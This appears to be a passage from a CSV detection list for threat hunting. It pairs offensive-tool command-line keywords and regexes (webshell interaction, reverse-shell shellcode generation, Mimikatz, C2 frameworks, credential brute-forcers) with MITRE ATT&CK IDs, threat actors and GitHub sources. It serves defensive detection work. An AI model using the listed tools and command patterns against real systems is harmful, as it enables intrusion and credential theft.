"* install trufflehog*",".{0,1000}\sinstall\strufflehog.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","1708"
"* install wapiti3*",".{0,1000}\sinstall\swapiti3.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","1710"
"* install wfuzz*",".{0,1000}\sinstall\swfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","1711"
"* install wordlists*",".{0,1000}\sinstall\swordlists.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1714"
"* install-sb.sh*",".{0,1000}\sinstall\-sb\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","N/A","7","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","1717"
"* insTof.py*",".{0,1000}\sinsTof\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","N/A","7","1","59","13","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z","1718"
"* intel -d * -whois*",".{0,1000}\sintel\s\-d\s.{0,1000}\s\-whois.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1719"
"* interact -u http*://*/*.aspx -p *",".{0,1000}\sinteract\s\-u\shttp.{0,1000}\:\/\/.{0,1000}\/.{0,1000}\.aspx\s\-p\s.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","1720"
"* interactive_shell.py*",".{0,1000}\sinteractive_shell\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","1721"
"* --interface * --analyze --disable-ess*",".{0,1000}\s\-\-interface\s.{0,1000}\s\-\-analyze\s\-\-disable\-ess.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1722"
"* --interface * --analyze --lm --disable-ess*",".{0,1000}\s\-\-interface\s.{0,1000}\s\-\-analyze\s\-\-lm\s\-\-disable\-ess.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1723"
"* -Internalmonologue  -Command *",".{0,1000}\s\-Internalmonologue\s\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","1724"
"* INTO LDAPHUNTERFINDINGS*",".{0,1000}\sINTO\sLDAPHUNTERFINDINGS.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","1725"
"* Inveigh-*",".{0,1000}\sInveigh\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1726"
"* Inveigh.ps1*",".{0,1000}\sInveigh\.ps1.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","1727"
"* Inveigh.ps1*",".{0,1000}\sInveigh\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1728"
"* Inveigh.ps1*",".{0,1000}\sInveigh\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","1729"
"* --invobf-args *",".{0,1000}\s\-\-invobf\-args\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","1730"
"* --invobf-powershell *",".{0,1000}\s\-\-invobf\-powershell\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","1731"
"* invoke admin-service -q *",".{0,1000}\sinvoke\sadmin\-service\s\-q\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","1732"
"* invoke admin-service -q *",".{0,1000}\sinvoke\sadmin\-service\s\-q\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","1733"
"* invoke query *FROM SMS_Admin*",".{0,1000}\sinvoke\squery\s.{0,1000}FROM\sSMS_Admin.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","1734"
"* invoke_sessiongopher*",".{0,1000}\sinvoke_sessiongopher.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1735"
"* invoke_vnc*",".{0,1000}\sinvoke_vnc.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1736"
"* Invoke-ADSBackdoor.ps1*",".{0,1000}\sInvoke\-ADSBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1737"
"* Invoke-CertToAccessToken -tenant *",".{0,1000}\sInvoke\-CertToAccessToken\s\-tenant\s.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","N/A","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","1738"
"* Invoke-DCOM.ps1*",".{0,1000}\sInvoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","1739"
"* Invoke-DCOM.ps1*",".{0,1000}\sInvoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1740"
"* Invoke-DCOMPowerPointPivot.ps1*",".{0,1000}\sInvoke\-DCOMPowerPointPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1741"
"* Invoke-Dump.ps1*",".{0,1000}\sInvoke\-Dump\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","1742"
"* Invoke-ExcelMacroPivot.ps1*",".{0,1000}\sInvoke\-ExcelMacroPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1743"
"* Invoke-GrabTheHash*",".{0,1000}\sInvoke\-GrabTheHash.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","1744"
"* Invoke-InternalMonologue.ps1*",".{0,1000}\sInvoke\-InternalMonologue\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1745"
"* Invoke-MDExclusionParser.ps1*",".{0,1000}\sInvoke\-MDExclusionParser\.ps1.{0,1000}","offensive_tool_keyword","MDExclusionParser","PowerShell script to quickly scan Event Log ID 5007 and 1121 for published Windows Defender Exclusions and Attack Surface Reduction (ASR) rule configuration.","T1562.001","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/ViziosDe/MDExclusionParser","1","0","N/A","N/A","5","1","6","1","2024-06-12T14:17:08Z","2024-06-12T11:56:07Z","1746"
"* Invoke-Mimikatz.ps1*",".{0,1000}\sInvoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1747"
"* Invoke-Nightmare*",".{0,1000}\sInvoke\-Nightmare.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/calebstewart/CVE-2021-1675","1","0","N/A","N/A","10","10","1049","230","2021-07-05T08:54:06Z","2021-07-01T23:45:58Z","1748"
"* Invoke-Patamenia*",".{0,1000}\sInvoke\-Patamenia.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","1749"
"* Invoke-PowerThIEf.ps1*",".{0,1000}\sInvoke\-PowerThIEf\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1750"
"* Invoke-ShareFinder -CheckShareAccess*",".{0,1000}\sInvoke\-ShareFinder\s\-CheckShareAccess.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","1751"
"* Invoke-Stealth.ps1*",".{0,1000}\sInvoke\-Stealth\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","1752"
"* Invoke-WMILM.ps1*",".{0,1000}\sInvoke\-WMILM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","1754"
"* Invoke-WMIRemoting.ps1*",".{0,1000}\sInvoke\-WMIRemoting\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","1755"
"* --ip * --port * --type cmd --language *",".{0,1000}\s\-\-ip\s.{0,1000}\s\-\-port\s.{0,1000}\s\-\-type\scmd\s\-\-language\s.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","0","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","1757"
"* -ip * -smb2support *lwpshare* ",".{0,1000}\s\-ip\s.{0,1000}\s\-smb2support\s.{0,1000}lwpshare.{0,1000}\s","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","1758"
"* -IP * -SpooferIP * -HTTP N*",".{0,1000}\s\-IP\s.{0,1000}\s\-SpooferIP\s.{0,1000}\s\-HTTP\sN.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","1759"
"* --ip * --variable shellcode *",".{0,1000}\s\-\-ip\s.{0,1000}\s\-\-variable\sshellcode\s.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","0","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","1760"
"* ip-forwarding.nse*",".{0,1000}\sip\-forwarding\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1761"
"* ip-geolocation-geoplugin.nse*",".{0,1000}\sip\-geolocation\-geoplugin\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1762"
"* ip-geolocation-ipinfodb.nse*",".{0,1000}\sip\-geolocation\-ipinfodb\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1763"
"* ip-geolocation-map-bing.nse*",".{0,1000}\sip\-geolocation\-map\-bing\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1764"
"* ip-geolocation-map-google.nse*",".{0,1000}\sip\-geolocation\-map\-google\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1765"
"* ip-geolocation-map-kml.nse*",".{0,1000}\sip\-geolocation\-map\-kml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1766"
